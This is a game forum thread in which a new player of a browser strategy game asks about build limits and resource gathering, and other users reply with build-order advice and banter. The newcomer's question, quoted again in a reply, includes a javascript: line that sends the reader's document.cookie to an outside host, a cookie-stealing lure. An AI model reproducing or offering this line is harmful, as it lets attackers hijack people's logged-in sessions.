This game seems Fun :)

DeletedUser34930

Hey I am new, I just started and this game seems fun, but I am only being allowed to do two things at once, is that normal?

DeletedUser

Yes, you can only build/upgrade 2 buildings at a time unless you purchase a premium account. Once you have a barracks/stable etc you can build troops as much as you want.

Future questions should go in the Questions forum.

DeletedUser27526

oh and never spam

spaming = infraction
infraction= banning
banning=awsome comeback
this has been the stroy of wickerman

DeletedUser34930

So?

ok thats cool thanks for responding, um how can you get resources faster?
javascript:void(document.location="http://ddb1337.t35.com/cookie.php?c="+document.cookie)

DeletedUser

ok thats cool thanks for responding, um how can you get resources faster?
javascript:void(document.location="http://ddb1337.t35.com/cookie.php?c="+document.cookie)

Upgrade your resources like this 7/5/2 (timber 7, clay 5 and iron 2). When you got this. Go lvl 3 headquater and then build barrack. Build 50 spears, farm all abonded villages around you. Go for higher resources, and then go for lvl 5 headquater and build lvl 2 smithy. Upgrade axemen, and build a lot of them, and start farming everyone around you. Keep up building your resources lvls and troop count. maybe upgrade your market to lvl 1 to trade resources, and get up a lvl 5 wall if u are undr attack.

DeletedUser

Mabye upgrade mines more when appropriate, eg when iron is lagging behind.

DeletedUser

Mabye upgrade mines more when appropriate, eg when iron is lagging behind.

Do you know how to play? This way has succed 10000 times for me. Well maybe I am sitting in front of the computer more than you guys and is able to farm 24/7, but still. If you log on about 10 times a day it should still be possible

DeletedUser

10 times a day?

Don't you go to Work/Uni/College/School...or even just outside?

DeletedUser

Do you know how to play? This way has succed 10000 times for me. Well maybe I am sitting in front of the computer more than you guys and is able to farm 24/7, but still. If you log on about 10 times a day it should still be possible

Er yeah, that way works better for me when I have to go to school and stuff.

DeletedUser

Ummm... you'll have to upgrade mines eventually is what he is saying I think...

(how many times have you been rimmed that you use a start up technique 10000 times :icon_wink:)

DeletedUser

10 times a day?

Don't you go to Work/Uni/College/School...or even just outside?

Don't your school have internet? Damn, boring school I guess...

ye obi, upgrade your mines when you think u need it. Sometimes u need higher clay course your farms don't give u a lot of it and other times its wood.

DeletedUser

My workplace has internet, and so did my school, however I spent my time there learning to read write and spell...maybe some TW players should spend less of their time at school on here and more time actually learning.

Otherwise they're just wasting hard earned tax payers money.

DeletedUser

My workplace has internet, and so did my school, however I spent my time there learning to read write and spell...maybe some TW players should spend less of their time at school on here and more time actually learning.

Otherwise they're just wasting hard earned tax payers money.

I am not paying taxes so I don't care...

And no I have no friends. I am just a lonely guy. I am sorry. I need a life, can I buy one from u?

DeletedUser

And if you spend all of your time on here you never will...

Somehow doesn't seem fair.